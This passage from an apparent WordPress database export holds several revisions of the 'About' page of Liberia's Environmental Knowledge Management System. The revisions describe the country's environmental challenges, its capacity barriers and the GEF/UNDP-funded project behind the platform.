Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 11:59:14','2019-11-12 11:59:14','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1960,1,'2019-11-12 12:05:41','2019-11-12 12:05:41','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 12:05:41','2019-11-12 12:05:41','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1961,1,'2019-11-12 12:09:34','2019-11-12 12:09:34','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and 